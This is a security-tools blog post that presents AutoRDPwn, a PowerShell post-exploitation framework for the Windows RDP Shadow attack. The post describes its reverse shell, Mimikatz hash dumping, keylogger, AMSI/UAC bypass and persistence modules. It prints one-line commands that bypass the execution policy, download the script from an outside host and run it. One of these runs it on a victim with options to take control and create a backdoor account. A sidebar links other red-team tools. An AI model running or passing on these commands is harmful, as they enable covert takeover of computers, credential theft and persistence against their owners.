AutoRDPwn : The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on demand, using tools native to the operating system itself.

Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.

Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

Powershell 4.0 or higher

Changes

Version 5.0

  • New logo completely redesigned from scratch
  • Full translation in 7 languages: es, en, fr, de, it, ru, pt
  • Remote execution through a reverse shell with UAC and AMSI Bypass
  • Partial support from Linux (more information in the user guide)
  • Improved remote execution (internet connection is no longer necessary on the victim)
  • New section available: Backdoors and persistence
  • New module available: Remote Keylogger
  • New section available: Privilege escalation
  • New module available: Obtain information from the operating system
  • New module available: Search vulnerabilities with Sherlock
  • New module available: Escalate privileges with PowerUp
  • New section available: Other Modules
  • New module available: Execute an external script

*The rest of the changes can be consulted in the CHANGELOG file

Also Read – Pyshark : Python Wrapper For TShark, Allowing Python Packet Parsing Using Wireshark Dissectors

Use

This application can be used locally, remotely or to pivot between teams.

When used remotely in a reverse shell, it is necessary to use the following parameters:

  • admin / -noadmin -> Depending on the permissions we have, we will use one or the other
  • nogui -> This will avoid loading the menu and some colors, guaranteed its functionality
  • lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
  • option -> As with the menu, we can choose how to launch the attack
  • shadow -> We will decide if we want to see or control the remote device
  • createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine

Local execution on one line:

powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1”

Example of remote execution on a line:

powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser”

Screenshots

R K

Recent Posts

ModTask – Task Scheduler Attack Tool

ModTask is an advanced C# tool designed for red teaming operations, focusing on manipulating scheduled…

10 hours ago

HellBunny : Advanced Shellcode Loader For EDR Evasio

HellBunny is a malleable shellcode loader written in C and Assembly utilizing direct and indirect…

10 hours ago

SharpRedirect : A Lightweight And Efficient .NET-Based TCP Redirector

SharpRedirect is a simple .NET Framework-based redirector from a specified local port to a destination…

10 hours ago

Flyphish : Mastering Cloud-Based Phishing Simulations For Security Assessments

Flyphish is an Ansible playbook allowing cyber security consultants to deploy a phishing server in…

1 day ago

DeLink : Decrypting D-Link Firmware Across Devices With A Rust-Based Library

A crypto library to decrypt various encrypted D-Link firmware images. Confirmed to work on the…

1 day ago

LLM Lies : Hallucinations Are Not Bugs, But Features As Adversarial Examples

LLMs (e.g., GPT-3.5, LLaMA, and PaLM) suffer from hallucination—fabricating non-existent facts to cheat users without…

1 day ago